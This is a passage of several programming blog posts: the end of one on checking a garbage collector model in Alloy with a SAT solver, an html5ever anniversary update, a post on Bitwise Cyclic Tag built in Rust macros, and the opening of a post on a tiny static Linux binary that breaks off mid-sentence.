<p>The development above looks nice and tidy — I hope — but in reality, it took a fair bit of messing around to get to this point. Alloy provides a highly interactive development experience. At any time, you can visualize your model as a collection of concrete examples. Let's do that now by adding these commands:</p>
<pre><code class="sourceCode"><span class="kw">pred</span> Show {}
<span class="kw">run</span> Show <span class="kw">for</span> 5</code></pre>
<p>Now we select this predicate from the "Execute" menu, then click "Show". The visualizer provides many options to customise the display of each atom and relation. The <a href="https://raw.githubusercontent.com/kmcallister/gc-models/master/simple/gc.thm">config that I made</a> for this project is "projected over <code>State</code>", which means you see a graph of the heap at one moment in time, with forward/back buttons to reach the other <code>State</code>s.</p>
<p>After clicking around a bit, you may notice some oddities:</p>
<div class="figure">
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_9b-s79d3J12QKe2ag1hWYwBNUYw15aUl_Wg0amFQs3Jjy0vSTlvylG-kd2XccfTggMLNeQRGJyYxD4fHdrpt-4rZ8_ReMwkaPs_r77f5FmNexbG4v7meoIXnfd179DsbA9QlSrx6sbf/s1600/ptr-to-root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ_9b-s79d3J12QKe2ag1hWYwBNUYw15aUl_Wg0amFQs3Jjy0vSTlvylG-kd2XccfTggMLNeQRGJyYxD4fHdrpt-4rZ8_ReMwkaPs_r77f5FmNexbG4v7meoIXnfd179DsbA9QlSrx6sbf/s320/ptr-to-root.png" alt="Diagram of a heap with an object pointing to the root" /></a></div>
</div>
<p>The root isn't a heap object; it represents all of the pointers that are reachable <em>without</em> accessing the heap. So it's meaningless for an object to point to the root. We can exclude these cases from the model easily enough:</p>
<pre><code class="sourceCode"><span class="kw">fact</span> {
<span class="kw">all</span> s: State | <span class="kw">no</span> s.pointers.Root
}</code></pre>
<p>(This can also be done more concisely as part of the original <code>sig</code>.)</p>
<p>Now we're ready to check the essential safety property of a garbage collector:</p>
<pre><code class="sourceCode"><span class="kw">assert</span> no_dangling {
<span class="kw">all</span> s: State | <span class="kw">no</span> (s.collected & s.live)
}
<span class="kw">check</span> no_dangling <span class="kw">for</span> 5 Object, 10 State</code></pre>
<p>And Alloy says:</p>
<pre><code>Executing "Check no_dangling for 5 Object, 10 State"
...
8338 vars. 314 primary vars. 17198 clauses. 40ms.
Counterexample found. Assertion is invalid. 14ms.</code></pre>
<p>Clicking "Counterexample" brings up the visualization:</p>
<div class="figure">
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW5pNQqNWjXnmwUTB688U1fWTLUBlNR_abXdw9PpLjSca97fHWduLsiCtLQz0OA4Aosw0IENrEcg5ibAfQFJFtk_v2ojg2zWkRNxKCEVg_9Aq8xxN6_3HrP8QIkdM4fLMOsB8p1kIs7Lg0/s1600/write-dead.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW5pNQqNWjXnmwUTB688U1fWTLUBlNR_abXdw9PpLjSca97fHWduLsiCtLQz0OA4Aosw0IENrEcg5ibAfQFJFtk_v2ojg2zWkRNxKCEVg_9Aq8xxN6_3HrP8QIkdM4fLMOsB8p1kIs7Lg0/s640/write-dead.png" alt="Diagram of four states. A single heap object is unrooted, then collected, but then the root grows a new pointer to it!"/></a></div>
</div>
<p>Whoops, we forgot to say that only pointers to live objects can be stored! We can fix this by modifying the <code>mutate</code> predicate:</p>
<pre><code class="sourceCode"><span class="kw">pred</span> mutate(s, t: State) {
t.collected = s.collected
t.pointers != s.pointers
<span class="kw">all</span> a: Object - t.live |
t.pointers[a] = s.pointers[a]
<span class="co">// new requirement!</span>
<span class="kw">all</span> a: t.live |
t.pointers[a] <span class="kw">in</span> s.live
}</code></pre>
<p>With the result:</p>
<pre><code>Executing "Check no_dangling for 5 Object, 10 State"
...
8617 vars. 314 primary vars. 18207 clauses. 57ms.
No counterexample found. Assertion may be valid. 343ms.
</code></pre>
<h1 id="sat-solvers-and-bounded-model-checking">SAT solvers and bounded model checking</h1>
<p>"May be" valid? Fortunately this has a specific meaning. We asked Alloy to look for counterexamples involving at most 5 objects and 10 time steps. This bounds the search for counterexamples, but it's still vastly more than we could ever check by exhaustive brute force search. (See where it says "8617 vars"? Try raising 2 to that power.) Rather, Alloy turns the bounded model into a Boolean formula, and feeds it to a <a href="http://en.wikipedia.org/wiki/Boolean_satisfiability_problem#Algorithms_for_solving_SAT">SAT solver</a>.</p>
<p>This all hinges on one of the weirdest things about computing in the 21st century. In complexity theory, SAT (along with many equivalents) is the prototypical "hardest problem" in NP. Why do we intentionally convert our problem into an instance of this "hardest problem"? I guess for me it illustrates a few things:</p>
<ul class="incremental">
<li><p>The huge gulf between worst-case complexity (the subject of classes like NP) and average or "typical" cases that we encounter in the real world. For more on this, check out <a href="http://blog.computationalcomplexity.org/2004/06/impagliazzos-five-worlds.html">Impagliazzo's "Five Worlds" paper</a>.</p></li>
<li><p>The fact that real-world difficulty involves a <a href="http://en.wikipedia.org/wiki/Coordination_game">coordination game</a>. SAT solvers got so powerful because everyone agrees SAT is <em>the</em> problem to solve. Standard input formats and public competitions were a key part of the amazing progress over the past decade or two.</p></li>
</ul>
<p>Of course SAT solvers aren't <em>quite</em> omnipotent, and Alloy can quickly get overwhelmed when you scale up the size of your model. Applicability to the real world depends on the <em>small scope hypothesis</em>:</p>
<blockquote>
<p>If an assertion is invalid, it probably has a small counterexample.</p>
</blockquote>
<p>Or equivalently:</p>
<blockquote>
<p>Systems that fail on large instances almost always fail on small instances with similar properties.</p>
</blockquote>
<p>This is far from a sure thing, but it already underlies a lot of approaches to software testing. With Alloy we have the certainty of proof <em>within</em> the size bounds, so we don't have to resort to massive scale to find rare bugs. It's difficult (but not impossible!) to imagine a GC algorithm that absolutely cannot fail on fewer than 6 nodes, but is buggy for larger heaps. <em>Implementations</em> will often fall over at some arbitrary resource limit, but algorithms and models are more abstract.</p>
<h1 id="conclusion">Conclusion</h1>
<p>It's not surprising that our correctness property</p>
<pre><code class="sourceCode"><span class="kw">all</span> s: State | <span class="kw">no</span> (s.collected & s.live)</code></pre>
<p>holds, since it's practically a restatement of the garbage collection "algorithm":</p>
<pre><code class="sourceCode">t.collected = s.collected + (Object - s.live)</code></pre>
<p>Because reachability is built into Alloy, via transitive closure, the simplest model of a garbage collector does not really describe an implementation. In the next article we'll look at <em>incremental</em> garbage collection, which breaks the reachability search into small units and allows the mutator to run in-between. This is highly desirable for interactive or real-time apps; it also complicates the algorithm quite a bit. We'll use Alloy to uncover some of these complications.</p>
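<p>An implementation has to perform the reachability search that Alloy's transitive closure gives us for free. A minimal stop-the-world sketch of one GC step, with hypothetical names and an integer-labeled heap (my illustration, not code from the model):</p>

```rust
use std::collections::{HashMap, HashSet, VecDeque};

// One GC step: mark everything reachable from the root, then
// collect the rest. This spells out the search that the Alloy model
// expresses with the transitive-closure operator.
fn gc_step(
    objects: &[u32],                   // the whole heap (Object)
    root: &[u32],                      // pointers reachable without the heap
    pointers: &HashMap<u32, Vec<u32>>, // per-object outgoing pointers
) -> HashSet<u32> {
    let mut live = HashSet::new();
    let mut queue: VecDeque<u32> = root.iter().copied().collect();
    while let Some(obj) = queue.pop_front() {
        if live.insert(obj) {
            if let Some(succs) = pointers.get(&obj) {
                queue.extend(succs.iter().copied());
            }
        }
    }
    // collected = Object - live
    objects.iter().copied().filter(|o| !live.contains(o)).collect()
}

fn main() {
    // Root points to 1, 1 points to 2; 3 and 4 form an unreachable cycle.
    let pointers = HashMap::from([(1, vec![2]), (3, vec![4]), (4, vec![3])]);
    let collected = gc_step(&[1, 2, 3, 4], &[1], &pointers);
    assert_eq!(collected, HashSet::from([3, 4]));
    println!("ok");
}
```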
<p>In the meantime, you can play around with the simple GC model and ask Alloy to visualize any scenario you like. For example, we can look at runs where the final state includes at least 5 pointers, and at least one collected object:</p>
<pre><code class="sourceCode"><span class="kw">pred</span> Show {
#(last.pointers) >= 5
<span class="kw">some</span> last.collected
}
<span class="kw">run</span> Show <span class="kw">for</span> 5</code></pre>
<p>Thanks for reading! You can find the code in a <a href="https://github.com/kmcallister/gc-models">GitHub repository</a> which I'll update if/when we get around to modeling more complex GCs.</p>

<h1>html5ever project update: one year! (2015-03-18, by keegan)</h1>

<p>I started <a href="https://github.com/servo/html5ever">the html5ever project</a> just a bit over <a href="https://github.com/servo/html5ever/commit/ed20f90f02900cfac093e23351d28d98d190e8dd">one year ago</a>. We
adopted the current name last July.</p>
<pre><code class="language-text"><kmc> maybe the whole project needs a better name, idk
<Ms2ger> htmlparser, perhaps
<jdm> tagsoup
<Ms2ger> UglySoup
<Ms2ger> Since BeautifulSoup is already taken
<jdm> html5ever
<Ms2ger> No
<jdm> you just hate good ideas
<pcwalton> kmc: if you don't call it html5ever that will be a massive missed opportunity
</code></pre>
<p>By that point we already had a few contributors. Now we have <a href="https://github.com/servo/html5ever/graphs/contributors">469 commits from
18 people</a>, which is just amazing. Thank you to everyone who helped
with the project. Over the past year we've upgraded Rust almost 50 times; I'm
extremely grateful to the community members who had a turn at this Sisyphean
task.</p>
<p>Several people have also contributed major enhancements. For example:</p>
<ul>
<li><p>Clark Gaebel implemented <a href="https://github.com/servo/html5ever/pull/60">zero-copy parsing</a>. I'm in the process of reviewing
this code and will be landing pieces of it in the next few weeks.</p></li>
<li><p>Josh Matthews made it possible to suspend and resume parsing from the tree sink.
<a href="https://github.com/servo/servo">Servo</a> needs this to do async resource fetching for external <code><script></code>s of the
old-school (non-<code>async</code>/<code>defer</code>) variety.</p></li>
<li><p>Chris Paris implemented fragment parsing and improved serialization. This means
Servo can use html5ever not only for parsing whole documents, but also for
the <code>innerHTML</code>/<code>outerHTML</code> getters and setters within the DOM.</p></li>
<li><p>Adam Roben brought us dramatically closer to spec conformance. Aside from foreign
(XML) content and <code>&lt;template&gt;</code>, we pass 99.6% of the html5lib tokenizer and tree
builder tests! Adam also improved the build and test infrastructure in a number
of ways.</p></li>
</ul>
<p>I'd also like to thank Simon Sapin for doing the initial review of my code, and
finding a few bugs in the process.</p>
<p>html5ever makes <a href="http://kmcallister.github.io/talks/rust/2014-rust-macros/slides.html">heavy use</a> of Rust's metaprogramming features. It's been
something of a wild ride, and we've collaborated with the Rust team in a number
of ways. Felix Klock <a href="https://github.com/rust-lang/rust/pull/16477">came through in a big
way</a> when a Rust upgrade
broke the entire tree builder. Lately, I've been working on improvements to
Rust's macro system ahead of the <a href="http://blog.rust-lang.org/2015/02/13/Final-1.0-timeline.html">1.0
release</a>, based
in part on my experience with html5ever.</p>
<p>Even with the early-adopter pains, the use of metaprogramming was absolutely
worth it. Most of the spec-conformance patches were only a few lines, because
our encoding of parser rules is so close to what's written in the spec. This
is especially valuable with a "living standard" like HTML.</p>
<h1 id="the-future" class='section-header'>The future</h1>
<p>Two upcoming enhancements are a high priority for Web compatibility in Servo:</p>
<ul>
<li><p><a href="https://github.com/servo/html5ever/issues/18">Character encoding detection and conversion</a>.
This will build on the zero-copy UTF-8 parsing mentioned above. Non-UTF-8 content
(~15% of the Web) will have "one-copy parsing" after a conversion to UTF-8. This keeps the
parser itself lean and mean.</p></li>
<li><p><a href="https://github.com/servo/html5ever/issues/6"><code>document.write</code> support</a>. This API can
insert arbitrary UTF-16 code units (which might not even be valid Unicode) in the
middle of the UTF-8 stream. To handle this, we might switch to
<a href="http://simonsapin.github.io/wtf-8/">WTF-8</a>. Along with <code>document.write</code> we'll start
to do <a href="https://github.com/servo/html5ever/issues/25">speculative parsing</a>.</p></li>
</ul>
<p>It's likely that I'll work on one or both of these in the next quarter.</p>
<p>Servo may get SVG support in the near future, thanks to
<a href="https://github.com/gabelerner/canvg">canvg</a>. SVG nodes can be embedded in
HTML or loaded from an external XML file. To support the first case, html5ever
needs to implement WHATWG's rules for parsing foreign content in HTML. To
handle external SVG we could use a proper XML parser, or we could extend
html5ever to support "<a href="https://github.com/servo/html5ever/issues/43">XML5</a>", an
error-tolerant XML syntax similar to WHATWG HTML. Ygg01 made some progress
towards implementing XML5. Servo would most likely use it for XHTML as well.</p>
<p>Improved performance is always a goal. html5ever describes itself as
"high-performance" but does not have specific comparisons to other HTML
parsers. I'd like to fix that in the near future. Zero-copy parsing will be a
substantial improvement, once some <a href="http://internals.rust-lang.org/t/the-sad-state-of-zero-on-drop/944">performance issues in
Rust</a> get
<a href="https://github.com/rust-lang/rfcs/blob/master/text/0320-nonzeroing-dynamic-drop.md">fixed</a>.
I'd like to revisit <a href="https://github.com/servo/html5ever/issues/22">SSE-accelerated
parsing</a> as well.</p>
<p>I'd also like to support <a href="https://github.com/servo/html5ever/issues/53">html5ever on some stable Rust 1.<i>x</i>
version</a>, although it probably
won't happen for 1.0.0. The main obstacle here is procedural macros. Erick
Tryzelaar has done some great work recently with
<a href="https://github.com/erickt/rust-syntex">syntex</a>,
<a href="https://github.com/erickt/rust-aster">aster</a>, and
<a href="https://github.com/erickt/rust-quasi">quasi</a>. Switching to this ecosystem will
get us close to 1.<i>x</i> compatibility <em>and</em> will clean up the macro code quite a
bit. I'll be working with Erick to use html5ever as an early validation of his
approach.</p>
<p>Simon has extracted Servo's CSS selector matching engine as <a href="https://github.com/servo/rust-selectors">a stand-alone
library</a>. Combined with html5ever this
provides most of the groundwork for <a href="http://users.rust-lang.org/t/kuchiki-a-vaporware-html-xml-tree-manipulation-library/435">a full-featured HTML manipulation
library</a>.</p>
<p>The C API for html5ever still builds, thanks to continuous integration. But
it's not complete or well-tested. With the <a href="https://github.com/rust-lang/rust/pull/19654">removal of Rust's
runtime</a>, maintaining the C API
does not restrict the kind of code we can write in other parts of the parser.
All we need now is to <a href="https://github.com/servo/html5ever/issues/33">complete the C
API</a> and write tests. This would
be a great thing for a community member to work on. Then we can write bindings
for every language under the sun and bring fast, correct, memory-safe HTML
parsing to the masses :)</p>

<h1>Turing tarpits in Rust's macro system (2015-02-20, by keegan)</h1>

<p><a href="http://esolangs.org/wiki/Bitwise_Cyclic_Tag">Bitwise Cyclic Tag</a> is an
extremely simple automaton slash programming language. BCT uses a program
string and a data string, each made of bits. The program string is interpreted
as if it were infinite, by looping back around to the first bit.</p>
<p>The program consists of commands executed in order. There is a single one-bit
command:</p>
<blockquote>
<p><strong>0</strong>: Delete the left-most data bit.</p>
</blockquote>
<p>and a single two-bit command:</p>
<blockquote>
<p><strong>1</strong> <em>x</em>: If the left-most data bit is 1, copy bit <em>x</em> to the right of the data string.</p>
</blockquote>
<p>We halt if ever the data string is empty.</p>
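<p>Before the macro version, the semantics can be pinned down as an ordinary Rust function — a sketch I'm adding for comparison; the explicit step limit is mine, since many BCT programs run forever:</p>

```rust
// A direct interpreter for Bitwise Cyclic Tag. `program` and `data`
// are bit strings; `max_steps` bounds execution because BCT need
// not halt.
fn bct(program: &[u8], mut data: Vec<u8>, max_steps: usize) -> Vec<u8> {
    let mut pc = 0; // index into the conceptually infinite program
    for _ in 0..max_steps {
        if data.is_empty() {
            break; // halt on empty data string
        }
        let cmd = program[pc % program.len()];
        pc += 1;
        if cmd == 0 {
            // command 0: delete the left-most data bit
            data.remove(0);
        } else {
            // command 1 x: if the left-most data bit is 1,
            // copy bit x to the right of the data string
            let x = program[pc % program.len()];
            pc += 1;
            if data[0] == 1 {
                data.push(x);
            }
        }
    }
    data
}

fn main() {
    // The program and data used in the macro example below: after six
    // steps the data string cycles back to 1, 0, 1.
    assert_eq!(bct(&[0, 0, 1, 1, 1], vec![1, 0, 1], 6), vec![1, 0, 1]);
    println!("ok");
}
```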
<p>Remarkably, this is enough to do <a href="http://esolangs.org/wiki/Turing_tarpit">universal
computation</a>. Implementing it in
<a href="http://doc.rust-lang.org/book/macros.html">Rust's macro system</a> gives a proof
(probably not the first one) that Rust's macro system is Turing-complete, aside
from the recursion limit imposed by the compiler.</p>
<pre id='rust-example-rendered' class='rust '>
<span class='attribute'>#<span class='op'>!</span>[<span class='ident'>feature</span>(<span class='ident'>trace_macros</span>)]</span>
<span class='macro'>macro_rules</span><span class='macro'>!</span> <span class='ident'>bct</span> {
<span class='comment'>// cmd 0: d ... => ...</span>
(<span class='number'>0</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span>)
<span class='op'>=></span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>0</span> ; ));
(<span class='number'>0</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)
<span class='op'>=></span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>0</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));
<span class='comment'>// cmd 1p: 1 ... => 1 ... p</span>
(<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='number'>1</span>)
<span class='op'>=></span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));
(<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='number'>1</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)
<span class='op'>=></span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));
<span class='comment'>// cmd 1p: 0 ... => 0 ...</span>
(<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)
<span class='op'>=></span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));
<span class='comment'>// halt on empty data string</span>
( $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; )
<span class='op'>=></span> (());
}
<span class='kw'>fn</span> <span class='ident'>main</span>() {
<span class='macro'>trace_macros</span><span class='macro'>!</span>(<span class='boolval'>true</span>);
<span class='macro'>bct</span><span class='macro'>!</span>(<span class='number'>0</span>, <span class='number'>0</span>, <span class='number'>1</span>, <span class='number'>1</span>, <span class='number'>1</span> ; <span class='number'>1</span>, <span class='number'>0</span>, <span class='number'>1</span>);
}
</pre>
<p>This produces the following compiler output:</p>
<pre><code class="language-text">bct! { 0 , 0 , 1 , 1 , 1 ; 1 , 0 , 1 }
bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 }
bct! { 1 , 1 , 1 , 0 , 0 ; 1 }
bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 1 }
bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 1 , 0 }
bct! { 1 , 1 , 1 , 0 , 0 ; 1 , 0 }
bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 0 , 1 }
bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 0 , 1 , 0 }
bct! { 1 , 1 , 1 , 0 , 0 ; 0 , 1 , 0 }
bct! { 1 , 0 , 0 , 1 , 1 ; 0 , 1 , 0 }
bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 , 0 }
bct! { 1 , 1 , 1 , 0 , 0 ; 1 , 0 }
bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 0 , 1 }
bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 0 , 1 , 0 }
bct! { 1 , 1 , 1 , 0 , 0 ; 0 , 1 , 0 }
bct! { 1 , 0 , 0 , 1 , 1 ; 0 , 1 , 0 }
bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 , 0 }
...
bct.rs:19:13: 19:45 error: recursion limit reached while expanding the macro `bct`
bct.rs:19 => (bct!($($ps),*, 1, $p ; $($ds),*));
^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</code></pre>
<p>You can <a href="http://is.gd/AtL7bG">try it online</a>, as well.</p>
<h1 id="notes-about-the-macro" class='section-header'>Notes about the macro</h1>
<p>I would much rather drop the commas and write</p>
<pre id='rust-example-rendered' class='rust '>
<span class='comment'>// cmd 0: d ... => ...</span>
(<span class='number'>0</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)
<span class='op'>=></span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>)<span class='op'>*</span> <span class='number'>0</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span>));
<span class='comment'>// cmd 1p: 1 ... => 1 ... p</span>
(<span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; <span class='number'>1</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)
<span class='op'>=></span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>)<span class='op'>*</span> <span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));
<span class='comment'>// cmd 1p: 0 ... => 0 ...</span>
(<span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)
<span class='op'>=></span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>)<span class='op'>*</span> <span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span>));
</pre>
<p>but this runs into the <a href="https://github.com/rust-lang/rfcs/blob/master/text/0550-macro-future-proofing.md">macro future-proofing
rules</a>.</p>
<p>If we're required to have commas, then it's at least nice to handle them
uniformly, e.g.</p>
<pre id='rust-example-rendered' class='rust '>
<span class='comment'>// cmd 0: d ... => ...</span>
(<span class='number'>0</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)
<span class='op'>=></span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>0</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));
<span class='comment'>// cmd 1p: 1 ... => 1 ... p</span>
(<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)
<span class='op'>=></span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));
<span class='comment'>// cmd 1p: 0 ... => 0 ...</span>
(<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)
<span class='op'>=></span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));
</pre>
<p>But this too is disallowed. An <code>$x:tt</code> variable cannot be followed by a
repetition <code>$(...)*</code>, even though it's (I believe) harmless. There is an <a href="https://github.com/rust-lang/rfcs/pull/733">open
RFC</a> about this issue. For now I
have to handle the "one" and "more than one" cases separately, which is
annoying.</p>
<p>In general, I don't think <code>macro_rules!</code> is a good language for arbitrary
computation. This experiment shows the hassle involved in implementing one of
the simplest known "arbitrary computations". Rather, <code>macro_rules!</code> is good at
expressing patterns of code reuse that <em>don't</em> require elaborate compile-time
processing. It does so in a way that's declarative, hygienic, and high-level.</p>
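<p>For instance, here's the kind of declarative reuse it handles well — a fresh illustration added here, with invented names: one rule stamps out the same <code>impl</code> for many types, with no compile-time computation at all.</p>

```rust
// A trait implemented identically for several types: exactly the
// repetitive boilerplate that macro_rules! expresses cleanly.
trait BitWidth {
    fn bit_width() -> u32;
}

macro_rules! impl_bit_width {
    ($($t:ty => $n:expr),*) => {
        $(
            impl BitWidth for $t {
                fn bit_width() -> u32 { $n }
            }
        )*
    };
}

impl_bit_width!(u8 => 8, u16 => 16, u32 => 32, u64 => 64);

fn main() {
    assert_eq!(<u16 as BitWidth>::bit_width(), 16);
    assert_eq!(<u64 as BitWidth>::bit_width(), 64);
    println!("ok");
}
```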
<p>However, there is a big middle ground of non-elaborate, but non-trivial
computations. <code>macro_rules!</code> is hardly ideal for that, but <a href="http://doc.rust-lang.org/book/plugins.html#syntax-extensions">procedural
macros</a> have
problems of their own. Indeed, the <code>bct!</code> macro is an extreme case of a
pattern I've found useful in the real world. The idea is that every
recursive invocation of a macro gives you another opportunity to pattern-match
the arguments. Some of <a href="http://kmcallister.github.io/talks/rust/2014-rust-macros/slides.html">html5ever's
macros</a>
do this, for example.</p>

<h1>151-byte static Linux binary in Rust (2015-01-10, by keegan)</h1>

<p>Part of the sales pitch for <a href="http://www.rust-lang.org/">Rust</a> is that it's "as
bare metal as C".<sup id="fnref1"><a href="#fn1" rel="footnote">1</a></sup> Rust can do anything C can do, run anywhere C
can run,<sup id="fnref2"><a href="#fn2" rel="footnote">2</a></sup> with code that's just as efficient, and at least as safe
(but usually much safer).</p>
<p>I'd say this claim is about 95% true, which is pretty good by the standards of
marketing claims. A while back I decided to put it to the test, by making the
smallest, most self-contained Rust program possible. After resolving a
<a href="https://github.com/rust-lang/rust/pull/17037">few</a>
